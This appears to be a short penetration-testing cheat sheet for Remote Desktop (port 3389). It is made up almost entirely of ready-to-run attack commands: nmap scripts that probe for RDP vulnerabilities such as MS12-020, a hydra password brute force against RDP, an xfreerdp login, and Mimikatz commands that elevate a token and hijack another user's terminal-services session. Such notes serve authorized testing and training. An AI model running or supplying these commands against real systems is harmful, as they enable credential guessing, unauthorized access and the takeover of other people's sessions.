# RDP 3389

### Enumerate RDP

{% code overflow="wrap" %}

```
nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 <IP>
```

{% endcode %}

### Brute Force

```
hydra -L <User/s.txt> -P <Password/s.txt> rdp://<IP>
```

### Connect to Windows RDP

```
xfreerdp /v:'<IP>' /u:'<User>' /p:'<Password>' +clipboard
```

## **Hijacking RDP**

### **Mimikatz**

```
Invoke-Mimikatz -Command '"ts::sessions"'
```

Connect to the terminal services session.

```
Invoke-Mimikatz -Command '"token::elevate" "ts::remote /id:4"'
```